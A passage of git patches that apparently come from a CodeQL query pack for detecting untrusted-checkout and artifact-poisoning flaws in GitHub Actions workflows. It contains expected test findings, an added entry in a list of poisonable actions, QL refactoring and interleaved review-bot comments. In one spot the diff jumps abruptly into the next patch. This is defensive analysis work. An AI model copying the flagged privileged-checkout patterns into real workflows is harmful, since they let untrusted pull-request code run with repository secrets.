.github/workflows/test24.yml:16:9:20:57 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:11:7:29:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | +| 
.github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | +| .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | +| .github/workflows/untrusted_checkout_6.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:21:9:23:23 | Run Step | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | +#select +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | 
pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | 
.github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | 
.github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | 
.github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | 
.github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | 
.github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | From a057b9dd4456c58d475a784a898acdbb81fbaa20 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:39:34 +0200 Subject: [PATCH 0612/1267] Add poisonable step for azure/powershell --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2ee9af6904e..e32bc48a983 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -4,6 +4,7 @@ extensions: extensible: poisonableActionsDataModel # source: https://boostsecurityio.github.io/lotp/ data: + - ["azure/powershell"] - ["pre-commit/action"] - ["oxsecurity/megalinter"] - ["bridgecrewio/checkov-action"] From b2a3aaacfd0b1fecd8aa8a609c05eafec16950a5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:40:25 +0200 Subject: [PATCH 0613/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 404c86d212c..5cf09c3601f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.72 +version: 0.1.73 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1296bbd667b..25486553ea8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.72 +version: 0.1.73 groups: [actions, queries] suites: codeql-suites extractor: javascript From d1d92ae68a25bee131e3fb60c5428cbc124027bc Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 10:13:20 +0200 Subject: [PATCH 0614/1267] Create getATriggerEvent for Steps and refactor the code to use it --- ql/lib/codeql/actions/Ast.qll | 6 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 13 +- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../codeql/actions/security/ControlChecks.qll | 2 +- .../security/OutputClobberingQuery.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 12 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 2 +- .../CWE-829/UntrustedCheckoutCritical.actual | 342 ------------------ .../UntrustedCheckoutCritical.expected | 2 + 9 files changed, 25 insertions(+), 360 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e41354ce31b..ad7bd67a18c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -17,6 +17,8 @@ class AstNode instanceof AstNodeImpl { Job getEnclosingJob() { result = super.getEnclosingJob() } + Event getATriggerEvent() { result = super.getATriggerEvent() } + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } @@ -100,8 +102,6 @@ class Workflow extends AstNode instanceof WorkflowImpl { Job getJob(string jobId) { result = super.getJob(jobId) } - Event getATriggerEvent() { result = super.getATriggerEvent() } - Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } @@ -200,8 +200,6 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } - Event getATriggerEvent() { result = super.getATriggerEvent() } - Strategy getStrategy() { result = super.getStrategy() } string getARunsOnLabel() { result = super.getARunsOnLabel() } 
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 67ef99e0fc8..ce6db22636c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -111,6 +111,11 @@ abstract class AstNodeImpl extends TAstNode { result = this.getEnclosingCompositeAction().getACallerJob() } + /** + * Gets and Event triggering this node. + */ + EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + /** * Gets the enclosing Step. */ @@ -447,7 +452,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } - EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } + override EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { @@ -486,7 +491,7 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } + override EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } @@ -918,7 +923,7 @@ class JobImpl extends AstNodeImpl, TJobNode { StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { + override EventImpl getATriggerEvent() { if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl then result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() 
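Review bot: The doc comment on the new `AstNodeImpl.getATriggerEvent()` reads "Gets and Event triggering this node." and should be `Gets an Event triggering this node.` Because the default is `result = this.getEnclosingJob().getATriggerEvent()`, the comment could also state that a node without an enclosing job yields no event unless a subclass overrides the predicate, as `CompositeActionImpl`, `WorkflowImpl` and `JobImpl` do in the later hunks of this file. The class bodies continue outside these hunks.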
@@ -1174,6 +1179,8 @@ class StepImpl extends AstNodeImpl, TStepNode { result = super.getEnclosingJob() } + override EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + EnvImpl getEnv() { result.getNode() = n.lookup("env") } /** Gets the ID of this step, if any. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index e0d46c7196d..0dca5bf45fb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -91,7 +91,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or checkout instanceof GitMutableRefCheckout @@ -239,7 +239,7 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 6293e4d6f3d..9b50a14bca2 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -57,7 +57,7 @@ abstract class ControlCheck extends AstNode { // The check is effective against the event and category this.protectsCategoryAndEvent(category, event.getName()) and // The check can be triggered by the event - this.getEnclosingJob().getATriggerEvent() = event + this.getATriggerEvent() = event } predicate dominates(AstNode node) { 
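Review bot: The `override EventImpl getATriggerEvent()` added to `StepImpl` has the same body as the default this commit adds to `AstNodeImpl`, `result = this.getEnclosingJob().getATriggerEvent()`, so it appears redundant. The inherited predicate would already dispatch to whatever `getEnclosingJob()` `StepImpl` defines. Dropping the override, or marking it with `// same as AstNodeImpl, kept explicit for readability`, would avoid two copies drifting apart. `StepImpl` starts and ends outside the hunk.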
diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 5850aa91e6e..e6cc0d06a46 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -30,7 +30,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or step instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ea3f4c3c269..01da214b6ea 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,7 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source.asExpr().getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and + source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -79,7 +79,7 @@ module ActionsMutableRefCheckoutFlow = TaintTracking::Global Date: Wed, 23 Oct 2024 10:37:33 +0200 Subject: [PATCH 0615/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5cf09c3601f..608e186ffcd 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.73 +version: 0.1.74 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 25486553ea8..cdd396f985c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.73 +version: 0.1.74 groups: [actions, queries] suites: codeql-suites extractor: javascript From c9bb42a46ce043675aa1431667e2c0297733803a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:14:20 +0200 Subject: [PATCH 0616/1267] Enforce a checkout kind of trigger to consider gh pr/gh api ... pulls as a source of untrusted data --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0dca5bf45fb..7dfdc42b05e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -129,7 +129,13 @@ class GhCLICommandSource extends RemoteFlowSource, CommandSource { run.getScript().getAStmt() = cmd and cmd.indexOf("gh ") = 0 and untrustedGhCommandDataModel(cmd_regex, flag) and - cmd.regexpMatch(cmd_regex + ".*") + cmd.regexpMatch(cmd_regex + ".*") and + ( + cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") and + run.getATriggerEvent().getName() = checkoutTriggers() + or + not cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") + ) ) } From fef37b6025485c0ba0f80f1c07a62fafabdb6b1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:15:26 +0200 Subject: [PATCH 0617/1267] Remove pull_request from context event map so that accesss to github.event.pull_request are not considered a source for pull_request triggers --- ql/lib/ext/config/context_event_map.yml | 4 ---- ql/lib/ext/config/externally_triggereable_events.yml | 1 - 2 files changed, 5 deletions(-) diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index a5e8ced2e9e..35ccafc5bee 100644 
